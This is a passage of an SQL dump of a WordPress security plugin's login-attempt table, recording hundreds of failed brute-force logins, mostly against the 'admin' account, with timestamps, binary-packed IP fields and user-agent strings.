Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(566,913,1624559342.867655,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��^L�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(567,915,1624559493.389567,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(568,916,1624559541.233681,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���FzC','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(569,917,1624559613.881822,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��T� ','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(570,923,1624560084.179164,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��co�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(571,924,1624560130.508577,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��ݏ0','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(572,930,1624560682.526843,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��r��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(573,931,1624560740.741882,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0�����','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(574,936,1624561172.424269,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���H�B','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(575,937,1624561219.381509,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��g�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(576,938,1624561383.465221,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���YY�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(577,939,1624561407.525666,1,'loginFailValidUsername','Admin',1,'\0\0\0\0\0\0\0\0\0\0�����m','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(578,941,1624561554.589682,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���a�1','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(579,942,1624561600.127254,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���#Jh','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(580,943,1624561673.245320,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0�����','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(581,944,1624561742.546569,1,'loginFailValidUsername','Admin',1,'\0\0\0\0\0\0\0\0\0\0����:�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(582,945,1624561792.316825,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��d\Z�%','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36'),(583,946,1624561792.944639,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��d\Z�%','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36'),(584,947,1624561793.693634,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��d\Z�%','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36'),(585,948,1624561794.507599,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��\"�F','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(586,949,1624561794.519554,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��d\Z�%','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36'),(587,948,1624561794.535343,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��\"�F','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(588,950,1624561795.918970,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��d\Z�%','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36'),(589,951,1624561796.674062,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��d\Z�%','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36'),(590,952,1624561797.515721,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��d\Z�%','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36'),(591,953,1624561798.153804,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��d\Z�%','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36'),(592,954,1624561798.828715,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��d\Z�%','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36'),(593,955,1624561799.467486,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��d\Z�%','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36'),(594,955,1624561799.506504,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��d\Z�%','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36'),(595,956,1624561800.398221,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��d\Z�%','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36'),(596,957,1624561801.006674,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��d\Z�%','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36'),(597,957,1624561801.088457,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��d\Z�%','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36'),(598,958,1624561801.667936,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��d\Z�%','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36'),(599,959,1624561802.264172,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��d\Z�%','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36'),(600,960,1624561802.822288,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��d\Z�%','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36'),(601,962,1624561863.621995,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��#�;','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.67 Safari/537.36'),(602,963,1624561887.998074,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��S��#','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(603,963,1624561888.041334,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��S��#','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(604,967,1624562134.950718,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���>\Z�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(605,968,1624562188.526338,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��co�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(606,970,1624562434.708396,1,'loginFailInvalidUsername','alejandromartinbilbao',0,'\0\0\0\0\0\0\0\0\0\0��k�.5','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit/537.77.4 (KHTML, like Gecko) Version/7.0.5 Safari/537.77.4'),(607,971,1624562442.369242,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��\r4��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(608,972,1624562524.074890,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����:�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(609,973,1624562579.881283,1,'loginFailValidUsername','Admin',1,'\0\0\0\0\0\0\0\0\0\0��e\0{�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(610,974,1624562655.089753,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��]}K','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(611,984,1624563222.330165,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��\"k(o','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(612,990,1624563554.864606,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��g�8','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(613,991,1624563664.579870,1,'loginFailValidUsername','Admin',1,'\0\0\0\0\0\0\0\0\0\0��-7<n','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(614,992,1624563696.303767,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���Z��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(615,996,1624563954.242520,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0�� R�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(616,997,1624564009.495790,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���H�&','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(617,1001,1624564305.730557,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��l�\Z�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(618,1002,1624564372.989649,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0�����','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(619,1003,1624564420.268953,1,'loginFailValidUsername','Admin',1,'\0\0\0\0\0\0\0\0\0\0��3Q�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(620,1006,1624564604.706591,1,'loginFailInvalidUsername','wpadmin',0,'\0\0\0\0\0\0\0\0\0\0��]}#','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(621,1008,1624564737.826553,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���Z��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(622,1009,1624564792.320547,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0������','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(623,1010,1624564863.426149,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��g�**','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(624,1014,1624565103.147495,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���Dx1','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(625,1014,1624565103.177714,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���Dx1','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(626,1015,1624565242.965481,1,'loginFailValidUsername','Admin',1,'\0\0\0\0\0\0\0\0\0\0��^2\'','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(627,1016,1624565299.054841,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��S��#','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(628,1024,1624565892.868923,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��ʬ\Z','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36'),(629,1025,1624565910.709524,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���,�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(630,1028,1624566102.836786,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��\'a�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(631,1029,1624566158.492109,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��3&)','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(632,1030,1624566217.054626,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���,�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(633,1031,1624566257.894615,1,'loginFailValidUsername','Admin',1,'\0\0\0\0\0\0\0\0\0\0��E1�^','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(634,1036,1624566583.224323,1,'loginFailValidUsername','Admin',1,'\0\0\0\0\0\0\0\0\0\0���&V�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(635,1037,1624566630.590013,1,'loginFailValidUsername','Admin',1,'\0\0\0\0\0\0\0\0\0\0�����','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(636,1043,1624566992.800670,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��ɔk_','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(637,1047,1624567299.728303,1,'loginFailValidUsername','Admin',1,'\0\0\0\0\0\0\0\0\0\0��)d','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(638,1047,1624567299.747338,1,'loginFailValidUsername','Admin',1,'\0\0\0\0\0\0\0\0\0\0��)d','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(639,1050,1624567483.645375,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���c?','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(640,1053,1624567666.069602,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����9d','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(641,1054,1624567714.722388,1,'loginFailValidUsername','Admin',1,'\0\0\0\0\0\0\0\0\0\0��k��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(642,1058,1624567984.403868,1,'loginFailValidUsername','Admin',1,'\0\0\0\0\0\0\0\0\0\0���\"%\'','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(643,1059,1624568030.233900,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���n��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(644,1061,1624568173.940016,1,'loginFailValidUsername','Admin',1,'\0\0\0\0\0\0\0\0\0\0���H@a','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(645,1062,1624568256.180708,1,'loginFailValidUsername','Admin',1,'\0\0\0\0\0\0\0\0\0\0�����_','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(646,1063,1624568314.042286,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��q��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(647,1064,1624568365.367159,1,'loginFailInvalidUsername','wpadmin',0,'\0\0\0\0\0\0\0\0\0\0��>','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(648,1065,1624568445.322846,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����tv','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(649,1065,1624568445.386377,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����tv','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(650,1066,1624568485.589698,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��>���','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(651,1069,1624568668.246460,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���Ǟf','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(652,1071,1624568804.141586,1,'loginFailValidUsername','Admin',1,'\0\0\0\0\0\0\0\0\0\0��]}K','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(653,1072,1624568847.815457,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���Z��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(654,1073,1624568915.638322,1,'loginFailInvalidUsername','siteadmin',0,'\0\0\0\0\0\0\0\0\0\0��3S�\n','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(655,1074,1624568983.012436,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��\"�1�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(656,1075,1624569027.803724,1,'loginFailValidUsername','Admin',1,'\0\0\0\0\0\0\0\0\0\0�����','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(657,1076,1624569116.463010,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��N�(�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(658,1077,1624569163.759985,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��>���','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(659,1078,1624569206.125601,1,'loginFailValidUsername','Admin',1,'\0\0\0\0\0\0\0\0\0\0��k��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(660,1083,1624569552.993267,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���?�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(661,1088,1624569867.720926,1,'loginFailValidUsername','Admin',1,'\0\0\0\0\0\0\0\0\0\0��-u��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(662,1088,1624569867.754110,1,'loginFailValidUsername','Admin',1,'\0\0\0\0\0\0\0\0\0\0��-u��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(663,1089,1624569909.313270,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��#��m','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(664,1091,1624570082.974427,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��D�$[','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(665,1092,1624570130.163989,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��k��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(666,1093,1624570154.693007,1,'loginFailValidUsername','Admin',1,'\0\0\0\0\0\0\0\0\0\0��|��+','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(667,1096,1624570286.232977,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����-%','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36'),(668,1099,1624570453.310093,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��QF�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(669,1100,1624570524.094249,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��ɔk_','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(670,1102,1624570647.501548,1,'loginFailValidUsername','Admin',1,'\0\0\0\0\0\0\0\0\0\0��-��#','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(671,1103,1624570704.294245,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��*','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(672,1103,1624570704.323554,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��*','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(673,1104,1624570773.306612,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��͓m�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(674,1105,1624570821.197863,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0�����y','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(675,1107,1624570963.301372,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���H�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(676,1108,1624571009.494062,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��A��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(677,1110,1624571154.681712,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0������','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(678,1111,1624571201.937664,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��}�ܓ','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(679,1114,1624571375.633321,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(680,1115,1624571444.140407,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���>\Z�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(681,1119,1624571736.386397,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���2:?','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(682,1121,1624571866.230389,1,'loginFailValidUsername','Admin',1,'\0\0\0\0\0\0\0\0\0\0���Z��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(683,1122,1624572044.718938,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��Xcڌ','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(684,1123,1624572090.956493,1,'loginFailValidUsername','Admin',1,'\0\0\0\0\0\0\0\0\0\0��g�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(685,1124,1624572175.417520,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���%*2','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(686,1125,1624572231.076435,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���c?','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(687,1126,1624572277.915752,1,'loginFailInvalidUsername','myadmin',0,'\0\0\0\0\0\0\0\0\0\0��A��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(688,1134,1624572784.407342,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���~A','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(689,1135,1624572904.605530,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���Y �','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(690,1138,1624573095.719156,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���X�|','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(691,1142,1624573397.492219,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����� ','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(692,1145,1624573753.038813,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���a�1','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(693,1154,1624574313.928109,1,'loginFailValidUsername','Admin',1,'\0\0\0\0\0\0\0\0\0\0��ݏ0�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(694,1155,1624574348.258403,1,'loginFailValidUsername','Admin',1,'\0\0\0\0\0\0\0\0\0\0���#p�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 